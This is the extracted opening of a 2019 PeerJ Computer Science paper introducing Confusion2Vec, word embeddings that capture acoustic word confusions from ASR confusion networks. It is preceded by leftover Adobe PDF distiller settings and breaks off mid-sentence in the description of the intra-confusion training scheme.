<FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_jfciwbeeifgkvl2k7eogkom2di ---- None work_jhgdjhqkh5dknobbgykk37oz4y ---- Confusion2Vec: towards enriching vector space word representations with representational ambiguities Confusion2Vec: towards enriching vector space word representations with representational ambiguities Prashanth Gurunath Shivakumar and Panayiotis Georgiou Electrical and Computer Engineering, University of Southern California, Los Angeles, CA, USA ABSTRACT Word vector representations are a crucial part of natural language processing (NLP) and human computer interaction. In this paper, we propose a novel word vector representation, Confusion2Vec, motivated from the human speech production and perception that encodes representational ambiguity. Humans employ both acoustic similarity cues and contextual cues to decode information and we focus on a model that incorporates both sources of information. The representational ambiguity of acoustics, which manifests itself in word confusions, is often resolved by both humans and machines through contextual cues. A range of representational ambiguities can emerge in various domains further to acoustic perception, such as morphological transformations, word segmentation, paraphrasing for NLP tasks like machine translation, etc. In this work, we present a case study in application to automatic speech recognition (ASR) task, where the word representational ambiguities/confusions are related to acoustic similarity. We present several techniques to train an acoustic perceptual similarity representation ambiguity. We term this Confusion2Vec and learn on unsupervised-generated data from ASR confusion networks or lattice-like structures. Appropriate evaluations for the Confusion2Vec are formulated for gauging acoustic similarity in addition to semantic–syntactic and word similarity evaluations. The Confusion2Vec is able to model word confusions efficiently, without compromising on the semantic-syntactic word relations, thus effectively enriching the word vector space with extra task relevant ambiguity information. We provide an intuitive exploration of the two-dimensional Confusion2Vec space using principal component analysis of the embedding and relate to semantic relationships, syntactic relationships, and acoustic relationships. We show through this that the new space preserves the semantic/syntactic relationships while robustly encoding acoustic similarities. The potential of the new vector representation and its ability in the utilization of uncertainty information associated with the lattice is demonstrated through small examples relating to the task of ASR error correction. Subjects Artificial Intelligence, Natural Language and Speech Keywords Confusion2vec, Word2vec, Embeddings, Word representations, Confusion networks, ASR output representations, Lexical representational ambiguity INTRODUCTION Decoding human language is challenging for machines. It involves estimation of efficient, meaningful representation of words. Machines represent the words in the form of real How to cite this article Gurunath Shivakumar P, Georgiou P. 2019. Confusion2Vec: towards enriching vector space word representations with representational ambiguities. PeerJ Comput. Sci. 5:e195 DOI 10.7717/peerj-cs.195 Submitted 19 November 2018 Accepted 13 April 2019 Published 10 June 2019 Corresponding author Panayiotis Georgiou, georgiou@sipi.usc.edu Academic editor Diego Amancio Additional Information and Declarations can be found on page 42 DOI 10.7717/peerj-cs.195 Copyright 2019 Gurunath Shivakumar and Georgiou Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.195 mailto:georgiou@�sipi.�usc.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.195 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ vectors and the language as a vector space. Vector space representations of language have applications spanning natural language processing (NLP) and human computer interaction fields. More specifically, word embeddings can act as features for machine translation, automatic speech recognition (ASR), document topic classification, information retrieval, sentiment classification, emotion recognition, behavior recognition, question answering, etc. Early work employed words as the fundamental unit of feature representation. This could be thought of as each word representing an orthogonal vector in a n-dimensional vector space of language with n-words (often referred to as one-hot representation). Such a representation, due to the inherent orthogonality, lacks crucial information regarding inter–word relationships such as similarity. Several techniques found using co-occurrence information of words are a better feature representation (Ex: n-gram language modeling). Subsequent studies introduced few matrix factorization based techniques to estimate a more efficient, reduced dimensional vector space based on word co-occurrence information. Latent semantic analysis (LSA) assumes an underlying vector space spanned by orthogonal set of latent variables closely associated with the semantics/meanings of the particular language. The dimension of this vector space is much smaller than the one-hot representation (Deerwester et al., 1990). LSA was proposed initially for information retrieval and indexing, but soon gained popularity for other NLP tasks. Hofmann (1999) proposed probabilistic LSA replacing the co-occurrence information by a statistical class based model leading to better vector space representations. Another popular matrix factorization method, the latent dirichlet allocation assumes a generative statistical model where the documents are characterized as a mixture of latent variables representing topics which are described by word distributions (Blei, Ng & Jordan, 2003). Recently, neural networks have gained popularity. They often outperform the n-gram models (Bengio et al., 2003; Mikolov et al., 2010) and enable estimation of more complex models incorporating much larger data than before. Various neural network based vector space estimation of words were proposed. Bengio et al. (2003) proposed feed- forward neural network based language models which jointly learned the distributed word representation along with the probability distribution associated with the representation. Estimating a reduced dimension continuous word representation allows for efficient probability modeling, thereby resulting in much lower perplexity compared to an n-gram model. Recurrent neural network based language models, with inherent memory, allowed for the exploitation of much longer context, providing further improvements compared to feed forward neural networks (Mikolov et al., 2010). Mikolov et al. (2013a) proposes a new technique of estimating vector representation (popularly termed word2vec) which showed promising results in preserving the semantic and syntactic relationships between words. Two novel architectures based on simple log-linear modeling (i) continuous skip-gram and (ii) continuous bag-of-words are introduced. Both the models are trained to model local context of word occurrences. The continuous skip-gram model predicts surrounding words given the current word. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 2/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Whereas, the continuous bag-of-words model predicts the current word given its context. The task evaluation is based on answering various analogy questions testing semantic and syntactic word relationships. Several training optimizations and tips were proposed to further improve the estimation of the vector space by Mikolov et al. (2013c) and Mnih & Kavukcuoglu (2013). Such efficient representation of words directly influences the performance of NLP tasks like sentiment classification (Kim, 2014), part-of-speech tagging (Ling et al., 2015), text classification (Lilleberg, Zhu & Zhang, 2015; Joulin et al., 2016), document categorization (Xing et al., 2014), and many more. Subsequent research efforts on extending word2vec involve expanding the word representation to phrases (Mikolov et al., 2013c), sentences and documents (Le & Mikolov, 2014). Similarly, training for contexts derived from the syntactic dependencies of a word is shown to produce useful representations (Levy & Goldberg, 2014). Using morphemes for word representations can enrich the vector space and provide gains especially for unknown, rarely occurring, complex words, and morphologically rich languages (Luong, Socher & Manning, 2013; Botha & Blunsom, 2014; Qiu et al., 2014; Cotterell & Schütze, 2015; Soricut & Och, 2015). Likewise, incorporating sub-word representations of words for the estimation of vector space is beneficial (Bojanowski et al., 2017). Similar studies using characters of words have also been tried (Chen et al., 2015). Yin & Schütze (2016) explored ensemble techniques for exploiting complementary information over multiple word vector spaces. Studies by Mikolov, Le & Sutskever (2013b) and Faruqui & Dyer (2014) demonstrate that vector space representations are extremely useful in extending the model from one language to another (or multi-lingual extensions) since the semantic relations between words are invariant across languages. Some have tried to combine the advantages from both matrix factorization based techniques and local-context word2vec models. Pennington, Socher & Manning (2014) proposes global log-bilinear model for modeling global statistical information as in the case of global matrix factorization techniques along with the local context information as in the case of word2vec. The goal of this study is to come up with a new vector space representation for words which incorporates the uncertainty information in the form of word confusions present in lattice like structures (e.g., confusion networks). Here, the word confusions refers to any word level ambiguities resultant of perception confusability or any algorithms such as machine translation, ASR etc. For example, acoustically confusable words in ASR lattices: “two” and “to” (see Fig. 1). A word lattice is a compact representation (directed acyclic weighted graphs) of different word sequences that are likely possible. A confusion network is a special type of lattice, where each word sequence is made to pass through each node of the graph. The lattices and confusion networks embed word confusion information. The study takes motivation from human perception, that is, the ability of humans to decode information based on two fairly independent information streams (see section “Human Speech Production, Perception and Hearing” for examples): (i) linguistic context (modeled by word2vec like word vector representations), and (ii) acoustic confusability (relating to phonology). Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 3/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ The present word vector representations like word2vec only incorporate the contextual confusability during modeling. However, in order to handle confusability and to decode human language/speech successfully, there is a need to model both the dimensions. Although primarily, the motivation is derived from human speech and perception, the confusions are not constrained to acoustics and can be extended to any confusions parallel to the linguistic contexts, for example, confusions present in lattices. Most of the machine learning algorithms output predictions as a probability measure. This uncertainty information stream can be expressed in the form of a lattice or a confusion network temporally, and is often found to contain useful information for subsequent processing and analysis. The scope of this work is to introduce a complementary (ideally orthogonal) subspace in addition to the underlying word vector space representation captured by word2vec. This new subspace captures the word confusions orthogonal to the syntactic and semantics of the language. We propose Confusion2Vec vector space operating on lattice like structures, specifically word confusion networks. We introduce several training configurations and evaluate their effectiveness. We also formulate appropriate evaluation criterion to assess the performance of each orthogonal subspaces, first independently and then jointly. Analysis of the proposed word vector space representation is carried out. The rest of the paper is organized as follows. Motivation for Confusion2vec, that is, the need to model word-confusions for word embeddings, is provided through means of human speech and perception, machine learning, and through potential applications in the section “Motivation”. A particular case study is chosen and the problem is formulated in the section “Case Study: Application to Automatic Speech Recognition”. In the section “Proposed Models”, different training configurations for efficient estimation of word embeddings are proposed. Additional tuning schemes for the proposed Confusion2vec models are presented in the section “Training Schemes”. Evaluation criterion formulation and evaluation database creation is presented in the section “Evaluation Methods”. Experimental setup and baseline system is described in the section “Data and Experimental Setup”. Results are I eye to two tees seat sit eat seedwant what wand Acoustic Confusability Axis Contextual Content Axis Figure 1 An example confusion network for ground-truth utterance “I want to sit.” Full-size DOI: 10.7717/peerj-cs.195/fig-1 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 4/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-1 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ tabulated and discussed in the section “Results”. Word vector space analysis is performed and findings are presented in the section “Vector Space Analysis”. Section “Discussion” discusses with the help of few toy examples, the benefits of the Confusion2vec embeddings for the task of ASR error correction. Section “Conclusion” draws the conclusion of the study and finally the future research directions are discussed in the section “Future Work”. MOTIVATION One efficient way to represent words as vectors is to represent them in a space that preserves the semantic and syntactic relations between the words in the language. Word2vec describes a technique to achieve such a representation by trying to predict the current word from its local context (or vice-versa) over a large text corpora. The estimated word vectors are shown to encode efficient syntactic-semantic language information. In this work, we propose a new vector space for word representation which incorporates various forms of word confusion information in addition to the semantic and syntactic information. The new vector space is inspired and motivated from the following factors from human speech production and perception and machine learning. Human speech production, perception, and hearing In our everyday interactions, confusability can often result in the need for context to decode the underlying words. “Please_____ a seat.” (Example 1) In Example 1, the missing word could be guessed from its context and narrowed down to either “have” or “take.” This context information is modeled through language models. More complex models such as word2vec also use the contextual information to model word vector representations. On the other hand, confusability can also originate from other sources such as acoustic representations. “I want to seat” (Example 2) In Example 2, the underlined word is mispronounced/misheard, and grammatically incorrect. In this case, considering the context there exists a lot of possible correct substitutions for the word “seat” and hence the context is less useful. The acoustic construct of the word “seat” can present additional information in terms of acoustic alternatives/similarity, such as “sit” and “seed.” “I want to s—” (Example 3) Similarly in Example 3, the underlined word is incomplete. The acoustic confusability information can be useful in the above case of broken words. Thus, since the confusability is acoustic, purely lexical vector representations like word2vec fail to encode or capture it. In this work, we propose to additionally encode the word (acoustic) confusability information to learn a better word embedding. Although the motivation is specific to Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 5/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ acoustics in this case, it could be extended to other inherent sources of word-confusions spanning various machine learning applications. Machine learning algorithms Most of the machine learning algorithms output hypothesis as a probability measure. Such a hypothesis could be represented in the form of a lattice, confusion network or n-best lists. It is often useful to consider the uncertainty associated with the hypothesis for subsequent processing and analysis (see section “Potential Applications”). The uncertainty information is often, orthogonal to the contextual dimension and is specific to the task attempted by the machine learning algorithms. Along this direction, recently, there have been several efforts concentrated on introducing lattice information into the neural network architecture. Initially, Tree-LSTM was proposed enabling tree-structured network topologies to be inputted to the RNNs (Tai, Socher & Manning, 2015), which could be adapted and applied to lattices (Sperber et al., 2017). LatticeRNN was proposed for processing word level lattices for ASR (Ladhak et al., 2016). Lattice based gated recurrent units (Su et al., 2017) and lattice-to-sequence models (Tan et al., 2018) were proposed for reading word lattice as input, specifically a lattice with tokenization alternatives for machine translation models. LatticeLSTM was adopted for lattice-to-sequence model incorporating lattice scores for the task of speech translation by Sperber et al. (2017). Buckman & Neubig (2018) proposed Neural lattice language models which enables to incorporate many possible meanings for words and phrases (paraphrase alternatives). Thus, a vector space representation capable of embedding relevant uncertainty information in the form of word confusions present in lattice-like structures or confusion networks along with the semantic and syntactic can be potentially superior to word2vec space. CASE STUDY: APPLICATION TO AUTOMATIC SPEECH RECOGNITION In this work, we consider the ASR task as a case study to demonstrate the effectiveness of the proposed Confusion2vec model in modeling acoustic word-confusability. However, the technique can be adopted for a lattice or confusion network output from potentially any algorithm to capture various patterns as discussed in the section “Potential Applications,” in which case the confusion-subspace (vertical ambiguity in Fig. 1), is no longer constrained to acoustic word-confusions. An ASR lattice contains multiple paths over acoustically similar words. A lattice could be transformed and represented as a linear graph forcing every path to pass through all the nodes (Xue & Zhao, 2005; Mangu, Brill & Stolcke, 2000). Such a linear graph is referred to as a confusion network. Figure 1 shows a sample confusion network output by ASR for the ground truth “I want to sit.” The confusion network could be viewed along two fundamental dimensions of information (see Fig. 1): (i) Contextual axis—sequential structure of a sentence, (ii) Acoustic axis—similarly sounding word alternatives. Traditional word vector representations such as word2vec only model the contextual Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 6/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ information (the horizontal (red) direction in Fig. 1). The word confusions, for example, the acoustic contextualization as in Fig. 1 (the vertical (green) direction in Fig. 1) is not encoded. We propose to additionally capture the co-occurrence information along the acoustic axis orthogonal to the word2vec. This is the main focus of our work, that is, to jointly learn the vertical, word-confusion context and the horizontal, semantic and syntactic context. In other words, we hypothesize to derive relationships between the semantics and syntaxes of language and the word-confusions (acoustic-confusion). Related work Bengio & Heigold (2014) trained a continuous word embedding of acoustically alike words (using n-gram feature representation of words) to replace the state space models (Hidden Markov Models, HMMs), decision trees, and lexicons of an ASR. Through the use of such an embedding and lattice re-scoring technique demonstrated improvements in word error rates of ASR. The embeddings are also shown to be useful in application to the task of ASR error detection by Ghannay et al. (2016). A few evaluation strategies are also devised to evaluate phonetic and orthographic similarity of words. Additionally, there have been studies concentrating on estimating word embeddings from acoustics (Kamper, Wang & Livescu, 2016; Chung et al., 2016; Levin et al., 2013; He, Wang & Livescu, 2016) with evaluations based on acoustic similarity measures. Parallely, word2vec like word embeddings have been used successfully to improve ASR Error detection performance (Ghannay, Estève & Camelin, 2015a; Ghannay et al., 2015b). We believe the proposed exploitation of both information sources, that is, acoustic relations and linguistic relations (semantics and syntaxes) will be beneficial in ASR and error detection, correction tasks. The proposed confusion2vec operates on the lattice output of the ASR in contrast to the work on acoustic word embeddings (Kamper, Wang & Livescu, 2016; Chung et al., 2016; Levin et al., 2013; He, Wang & Livescu, 2016) which is directly trained on audio. The proposed Confusion2vec differs from works by Bengio & Heigold (2014) and Ghannay et al. (2016), which also utilize audio data with the hypothesis that the layer right below softmax layer of a deep end-to-end ASR contains acoustic similarity information of words. Confusion2vec can also be potentially trained without an ASR, on artificially generated data, emulating an ASR (Tan et al., 2010; Sagae et al., 2012; Celebi et al., 2012; Kurata, Itoh & Nishimura, 2011; Dikici, Celebi & Saraçlar, 2012; Xu, Roark & Khudanpur, 2012). Thus, Confusion2vec can potentially be trained in a completely unsupervised manner and with appropriate model parameterization incorporate various degrees of acoustic confusability, for example, stemming from noise or speaker conditions. Further, in contrast to the prior works on lattice encoding RNNs (Tai, Socher & Manning, 2015; Sperber et al., 2017; Ladhak et al., 2016; Su et al., 2017; Tan et al., 2018; Buckman & Neubig, 2018), which concentrate on incorporating the uncertainty information embedded in the word lattices by modifying the input architecture for recurrent neural network, we propose to introduce the ambiguity information from the lattices to the word embedding explicitly. We expect similar advantages as with lattice encoding RNNs in using the pre-trained confusion2vec embedding toward various tasks Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 7/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ like ASR, Machine translation etc. Moreover, our architecture doesn’t require memory which has significant advantages in terms of training complexity. We propose to train the embedding in a similar way to word2vec models (Mikolov et al., 2013a). All the well studied previous efforts toward optimization of training such models (Mikolov et al., 2013c; Mnih & Kavukcuoglu, 2013), should apply to our proposed model. PROPOSED MODELS In this section, we propose four training schemes for Confusion2Vec. The training schemes are based on the word2vec model. Word2vec work (Mikolov et al., 2013a) proposed log-linear models, that is, a neural network consisting of a single linear layer (projection matrix) without non-linearity. These models have significant advantages in training complexity. Mikolov et al. (2013a) found the skip-gram model to be superior to the bag-of-word model in a semantic-syntactic analogy task. Hence, we only employ the skip-gram configuration in this work. Appropriately, the skip-gram word2vec model is also adopted as the baseline for this work. The choice of the skip-gram modeling in this work is mainly based on its popularity, ease of implementation, low complexity, and being a well-proven technique in the community. However, we strongly believe the proposed concept (introducing word ambiguity information) is independent of the modeling technique itself and should translate to relatively newer techniques like GloVe Pennington, Socher & Manning (2014) and fastText Bojanowski et al. (2017). Top-confusion training—C2V-1 We adapt the word2vec contextual modeling to operate on the confusion network (in our case confusion network of an ASR). Figure 2 shows the training configuration of the skip-gram word2vec model on the confusion network. The top-confusion model considers the context of only the top hypothesis of the confusion network (single path) for training. w t,1 w t,2 w t,3 w t-1,1 w t-1,2 w t-1,3 w t+1,1 w t+1,2 w t+1,3 w t+2,1 w t+2,2 w t+2,3 w t-2,1 w t-2,2 w t-2,3 C(t-2) C(t-1) C(t+1) C(t+2) Output C(t) Input Figure 2 Top-confusion2vec training scheme for confusion networks. C(t) is a unit word confusion in the confusion network at a time-stamp t, that is, C(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion C(t). Word confusions are sorted in decreasing order of their posterior probability: P(wt,1) > P(wt,2) > P(wt,3) : : : . Full-size DOI: 10.7717/peerj-cs.195/fig-2 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 8/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-2 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ For clarity we call this the C2V-1 model since it’s using only the 1 top hypothesis. The words wt-2,1, wt-1,1, wt+1,1, and wt+2,1 (i.e., the most probable words in the confusions C(t-2), C(t-1), C(t+1), and C(t+2), respectively) are predicted from wt,1 (i.e., the most probable word in C(t)) for a skip-window of 2 as depicted in Fig. 2. The top hypothesis typically consists of noisy transformations of the reference ground-truth (Note: the confusion network will inherently introduce additional paths to the lattice). In the case of a confusion network of an ASR, the noisy transformations correspond to acoustic word confusions. Thus, the top-confusion model implicitly captures word confusions (co-occurring within the context of the skip-window). Intra-confusion training—C2V-a Next, we explore the direct adaptation of the skip-gram modeling but on the confusion dimension (i.e., considering word confusions as contexts) rather than the traditional sequential context. Figure 3 shows the training configuration over a confusion network. In short, every word is linked with every other alternate word in the confusion dimension (i.e., between set of confusable words) through the desired network (as opposed to the temporal context dimension in the word2vec training). For clarity, since this is only using acoustically alternate words, we call this the C2V-acoustics or C2V-a model for short. Note, we disallow any word being predicted from itself (this constrain is indicated with curved dotted lines in the figure). As depicted in the Fig. 3, the word wt,i w t,1 w t,2 w t,3 C(t) Input Output w t,1 w t,2 w t,3 C(t) w t+1,1 w t+1,2 w t+1,3 C(t+2) w t+1,1 w t+1,2 w t+1,3 C(t+1) w t-1,1 w t-1,2 w t-1,3 C(t-1) w t-1,1 w t-1,2 w t-1,3 C(t-1) Figure 3 Proposed intra-confusion training scheme for confusion networks. C(t) is a unit word confusion in the confusion network at a time- stamp t, that is, C(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion C(t). Word confusions are sorted in decreasing order of their posterior probability: P(wt,1) > P(wt,2) > P(wt,3) : : : . The dotted curved lines denote that the self-mapping is disallowed. Full-size DOI: 10.7717/peerj-cs.195/fig-3 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 9/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-3 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ (confusion context) is predicted from wt,j (current word), where i = 1,2,3 : : : length(C(t)) and j s i, for each j = 1,2,3 : : : length(C(t)) for confusion C(t) ∀t. We expect such a model to capture inherent relations over the different word confusions. In the context of an ASR lattice, we expect it to capture intrinsic relations between similarly sounding words (acoustically similar). However, the model would fail to capture 